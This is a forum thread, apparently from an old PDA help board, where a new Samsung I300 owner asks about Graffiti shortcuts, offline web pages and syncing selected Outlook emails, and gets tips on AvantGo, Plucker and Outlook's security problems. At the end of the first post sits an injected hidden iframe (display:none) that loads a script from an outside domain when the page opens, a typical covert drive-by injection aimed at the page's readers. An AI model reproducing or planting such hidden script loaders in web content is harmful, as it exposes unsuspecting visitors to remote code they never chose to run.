+ Reply to Thread

New to I300 and Palm

Help! I just bought a used Samsung I300 and have never owned a PALM PDA before. I have searched the manual that came on the CD for information about using shortcuts and can't find the info on how to use them or what applications they can be used in.

I was also trying to find out if there is a way to save web pages on my pc and view them later on the I300.

When I write a memo on the PDA where is it saved when I hotsync?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

What sort of shortcuts are you looking for?

As for viewing web pages from your PC you can try Avantgo at https://my.avantgo.com/home/

Thanks for the tip about avantgo.com, I went there but I'm not sure that is what I am looking for. It seemed that there is a limited number of sites to go to. Right now I am shopping for a camera and when I find a seller that I would like to contact or compare different cameras, I would like to view pages from the manufacturer's website.

I found what I was looking for in the Graffiti help for using shortcuts. I learn more by my mistakes than a manual. I am a hands on learner and the manual is either too simple at times or uses terms that I don't understand.

K7AAY Treo 650/Cing & Nokia9300/TMo johnbartley's Avatar

Capturing web pages

Capturing web pages is easily done with Plucker freeware from
    www.plkr.org

I use it for web sites which AvantGo won't access, as well as reference material I carry with me. _Very_ useful.

www.freewarepalm.com is useful, BTS, as is
    www.baen.com/library - which will get you started on the use of e-books with four dozen diverse free contemporary titles.

Thumbs up

John, Thanks for that info, it sounds like its just what I was looking for. I'll check it out.

Do you know if there is a way of picking individual emails in Outlook to download to my Samsung? I didn't set mine up for email because I don't plan on using it for that. But, sometimes there is a message that I don't have time to read before going to work that I would like to have. I just don't want all the rest and don't want to delete the ones on my PC if I would delete them on the I300.

Outlook?

Sory, but Outllok is such a security risk I am forbidden to use it by my agency, and consequently I use Mozila and Eudora instead. Can't help you w/ the Outlook thing.

Suggest you go to groups.google.com, enter comp.sys.palmtops.pilot and then post your question there.

You can setup your mail app that your phone came with to download any unread messages from outlook when you hotsync.

To download only the message you want just right click to make sure to mark the ones you want unread and the ones you don't read.

Hope this helps

sprint pcs beta tester macmetal666's Avatar
    outlook is a bad idea. best thing to do is use an outside server like yahoo and just retrive as you need, thats what i do. also for tips with avantgo, go to it pick out the accuweather.com, usatoday.com and the local newspaper(or tv station-wral here in raleigh has a channel). when you hostync with your computer as long as you are connected to the internet, it will retrive those pages for you. also dont forget to get the ag connect feature. the i300 can also download these channles for you using the wireless web connection, but beware...airtime charges apply and it can take several minutes(as fast as 5 or as slow as 45)

keep in mind that even the i series doesnt have FULL web browsers yet. they are still incapible of going some places
    my i500 is more obsolete than your ti-99 or apple IIe

Why is outlook such a bad idea?

Why outlook is evil

1. It stores your data in a propritary and undocumented format.

2. The file structure is very unstable and miinor problems can corrupt it beyond recovery.

3. The program itself is full of security vulnerabilities. It requires quite a bit of work ot apply all the patches and then to make sure the patches did not fail upon application, leaving you vulnerable to intrusion.

Dr. Jerry Pournelle, esteemed and reknowned comuter columnist, has had _many_ things to say about these problems. Please see
    http://www.jerrypournelle.com